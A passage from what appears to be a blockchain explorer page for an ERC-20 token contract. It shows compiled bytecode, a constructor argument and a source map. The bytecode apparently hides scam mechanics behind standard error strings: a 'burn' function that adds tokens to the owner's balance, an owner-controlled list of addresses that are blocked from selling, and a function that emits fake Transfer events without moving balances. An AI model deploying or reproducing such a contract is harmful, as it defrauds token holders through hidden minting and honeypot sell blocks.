f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea2646970667358221220d417ddeb952e4354497c3e45e6971dec0e6d99e75527937467bc453ba63a91bc64736f6c63430008120033000000000000000000000000d019136507a6de22af8d63a70cf9e30befe86d2b
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c80635342acb4116100a257806395d89b411161007157806395d89b41146102e1578063a457c2d7146102ff578063a9059cbb1461032f578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b80635342acb41461025957806370a0823114610289578063715018a6146102b95780638da5cb5b146102c357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631186b8d81461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906114a5565b60405180910390f35b6102a3600480360381019061029e9190611706565b6107ed565b6040516102b091906115c0565b60405180910390f35b6102c1610836565b005b6102cb61084a565b6040516102d89190611742565b60405180910390f35b6102e9610874565b6040516102f6919061138a565b60405180910390f35b6103196004803603810190610314919061144a565b610906565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061144a565b6109f1565b60405161035691906114a5565b60405180910390f35b6103796004803603810190610374919061175d565b610a0f565b60405161038691906115c0565b60405180910390f35b6103a960048036038101906103a49190611706565b610a96565b005b6060600680546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160046000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846003600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61083e610cea565b6108486000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610883906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546108af906117cc565b80156108fc5780601f106108d1576101008083540402835291602001916108fc565b820191906000526020600020905b8154815290600101906020018083116108df57829003601f168201915b5050505050905090565b60008060036000610915610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c9906119db565b60405180910390fd5b6109e66109dd610b19565b85858403610b21565b600191505092915050565b6000610a056109fe610b19565b8484610d7e565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a9e610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0490611a6d565b60405180910390fd5b610b1681611234565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea2646970667358221220d417ddeb952e4354497c3e45e6971dec0e6d99e75527937467bc453ba63a91bc64736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000d019136507a6de22af8d63a70cf9e30befe86d2b
-----Decoded View---------------
Arg [0] : _reserve (address): 0xD019136507a6DE22af8d63a70Cf9E30BEfE86D2B
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000d019136507a6de22af8d63a70cf9e30befe86d2b
Deployed Bytecode Sourcemap
133:8438:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1093:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2668:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8371:195;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1507:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3562:426;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1311:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5009:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7231:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7711:92;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7424:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1787:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1173:103:3;;;:::i;:::-;;942:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;896:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4306:370;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2188:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3105:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1284:201:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1093:94:1;1147:13;1176:5;1169:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1093:94;:::o;2668:149::-;2746:4;2759:34;2768:12;:10;:12::i;:::-;2782:2;2786:6;2759:8;:34::i;:::-;2807:4;2800:11;;2668:149;;;;:::o;8371:195::-;901:13:3;:11;:13::i;:::-;8456:9:1::1;8451:110;8475:4;;:11;;8471:1;:15;8451:110;;;8550:3;8508:30;:39;8539:4;;8544:1;8539:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;8508:39;;;;;;;;;;;;;;;;:45;;;;;;;;;;;;;;;;;;8488:3;;;;;:::i;:::-;;;;8451:110;;;;8371:195:::0;;;:::o;1507:102::-;1568:7;1591:12;;1584:19;;1507:102;:::o;3562:426::-;3668:4;3681:36;3691:6;3699:9;3710:6;3681:9;:36::i;:::-;3726:24;3753:11;:19;3765:6;3753:19;;;;;;;;;;;;;;;:33;3773:12;:10;:12::i;:::-;3753:33;;;;;;;;;;;;;;;;3726:60;;3821:6;3801:16;:26;;3793:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;3898:57;3907:6;3915:12;:10;:12::i;:::-;3948:6;3929:16;:25;3898:8;:57::i;:::-;3978:4;3971:11;;;3562:426;;;;;:::o;1311:94::-;1369:5;462:1;1383:16;;1311:94;:::o;5009:190::-;5092:4;5105:70;5114:12;:10;:12::i;:::-;5128:2;5164:10;5132:11;:25;5144:12;:10;:12::i;:::-;5132:25;;;;;;;;;;;;;;;:29;5158:2;5132:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;5105:8;:70::i;:::-;5189:4;5182:11;;5009:190;;;;:::o;7231:185::-;901:13:3;:11;:13::i;:::-;7325:9:1::1;7320:91;7344:4;;:11;;7340:1;:15;7320:91;;;7390:4;;7395:1;7390:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;7378:25;;7387:1;7378:25;;;7399:3;7378:25;;;;;;:::i;:::-;;;;;;;;7357:3;;;;;:::i;:::-;;;;7320:91;;;;7231:185:::0;;;;:::o;7711:92::-;901:13:3;:11;:13::i;:::-;7770:27:1::1;7776:12;:10;:12::i;:::-;7790:6;7770:5;:27::i;:::-;7711:92:::0;:::o;7424:127::-;7487:4;7507:30;:38;7538:6;7507:38;;;;;;;;;;;;;;;;;;;;;;;;;7500:45;;7424:127;;;:::o;1787:121::-;1861:7;1884:9;:18;1894:7;1884:18;;;;;;;;;;;;;;;;1877:25;;1787:121;;;:::o;1173:103:3:-;901:13;:11;:13::i;:::-;1238:30:::1;1265:1;1238:18;:30::i;:::-;1173:103::o:0;942:87::-;988:7;1015:6;;;;;;;;;;;1008:13;;942:87;:::o;896:98:1:-;952:13;981:7;974:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;896:98;:::o;4306:370::-;4394:4;4407:24;4434:11;:25;4446:12;:10;:12::i;:::-;4434:25;;;;;;;;;;;;;;;:29;4460:2;4434:29;;;;;;;;;;;;;;;;4407:56;;4498:15;4478:16;:35;;4470:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;4581:62;4590:12;:10;:12::i;:::-;4604:2;4627:15;4608:16;:34;4581:8;:62::i;:::-;4666:4;4659:11;;;4306:370;;;;:::o;2188:165::-;2274:4;2287:42;2297:12;:10;:12::i;:::-;2311:9;2322:6;2287:9;:42::i;:::-;2343:4;2336:11;;2188:165;;;;:::o;3105:133::-;3188:7;3211:11;:17;3223:4;3211:17;;;;;;;;;;;;;;;:21;3229:2;3211:21;;;;;;;;;;;;;;;;3204:28;;3105:133;;;;:::o;1284:201:3:-;901:13;:11;:13::i;:::-;1393:1:::1;1373:22;;:8;:22;;::::0;1365:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1449:28;1468:8;1449:18;:28::i;:::-;1284:201:::0;:::o;646:98:0:-;699:7;726:10;719:17;;646:98;:::o;8061:304:1:-;8169:1;8153:18;;:4;:18;;;8145:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;8241:1;8227:16;;:2;:16;;;8219:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;8315:6;8291:11;:17;8303:4;8291:17;;;;;;;;;;;;;;;:21;8309:2;8291:21;;;;;;;;;;;;;;;:30;;;;8348:2;8333:26;;8342:4;8333:26;;;8352:6;8333:26;;;;;;:::i;:::-;;;;;;;;8061:304;;;:::o;1037:128:3:-;1101:5;:19;1107:12;:10;:12::i;:::-;1101:19;;;;;;;;;;;;;;;;;;;;;;;;;1093:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1037:128::o;5455:684:1:-;5566:1;5557:6;:10;5549:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;5632:1;5614:20;;:6;:20;;;5606:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;5712:1;5691:23;;:9;:23;;;5683:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;5763:21;5787:9;:17;5797:6;5787:17;;;;;;;;;;;;;;;;5763:41;;5836:6;5819:13;:23;;5811:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;5895:30;:38;5926:6;5895:38;;;;;;;;;;;;;;;;;;;;;;;;;5892:81;;;5963:1;5953:6;:11;5945:20;;;;;;5892:81;6034:6;6018:13;:22;5998:9;:17;6008:6;5998:17;;;;;;;;;;;;;;;:42;;;;6078:6;6054:9;:20;6064:9;6054:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;6115:9;6098:35;;6107:6;6098:35;;;6126:6;6098:35;;;;;;:::i;:::-;;;;;;;;5542:597;5455:684;;;:::o;6814:407::-;6917:1;6898:21;;:7;:21;;;6890:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;6970:22;6995:9;:18;7005:7;6995:18;;;;;;;;;;;;;;;;6970:43;;7050:6;7032:14;:24;;7024:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;7155:6;7138:14;:23;7117:9;:18;7127:7;7117:18;;;;;;;;;;;;;;;:44;;;;7204:1;7178:37;;7187:7;7178:37;;;7208:6;7178:37;;;;;;:::i;:::-;;;;;;;;6879:342;6814:407;;:::o;1493:191:3:-;1567:16;1586:6;;;;;;;;;;;1567:25;;1612:8;1603:6;;:17;;;;;;;;;;;;;;;;;;1667:8;1636:40;;1657:8;1636:40;;;;;;;;;;;;1556:128;1493:191;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:117::-;3555:1;3552;3545:12;3569:117;3678:1;3675;3668:12;3692:117;3801:1;3798;3791:12;3832:568;3905:8;3915:6;3965:3;3958:4;3950:6;3946:17;3942:27;3932:122;;3973:79;;:::i;:::-;3932:122;4086:6;4073:20;4063:30;;4116:18;4108:6;4105:30;4102:117;;;4138:79;;:::i;:::-;4102:117;4252:4;4244:6;4240:17;4228:29;;4306:3;4298:4;4290:6;4286:17;4276:8;4272:32;4269:41;4266:128;;;4313:79;;:::i;:::-;4266:128;3832:568;;;;;:::o;4406:116::-;4476:21;4491:5;4476:21;:::i;:::-;4469:5;4466:32;4456:60;;4512:1;4509;4502:12;4456:60;4406:116;:::o;4528:133::-;4571:5;4609:6;4596:20;4587:29;;4625:30;4649:5;4625:30;:::i;:::-;4528:133;;;;:::o;4667:698::-;4759:6;4767;4775;4824:2;4812:9;4803:7;4799:23;4795:32;4792:119;;;4830:79;;:::i;:::-;4792:119;4978:1;4967:9;4963:17;4950:31;5008:18;5000:6;4997:30;4994:117;;;5030:79;;:::i;:::-;4994:117;5143:80;5215:7;5206:6;5195:9;5191:22;5143:80;:::i;:::-;5125:98;;;;4921:312;5272:2;5298:50;5340:7;5331:6;5320:9;5316:22;5298:50;:::i;:::-;5288:60;;5243:115;4667:698;;;;;:::o;5371:118::-;5458:24;5476:5;5458:24;:::i;:::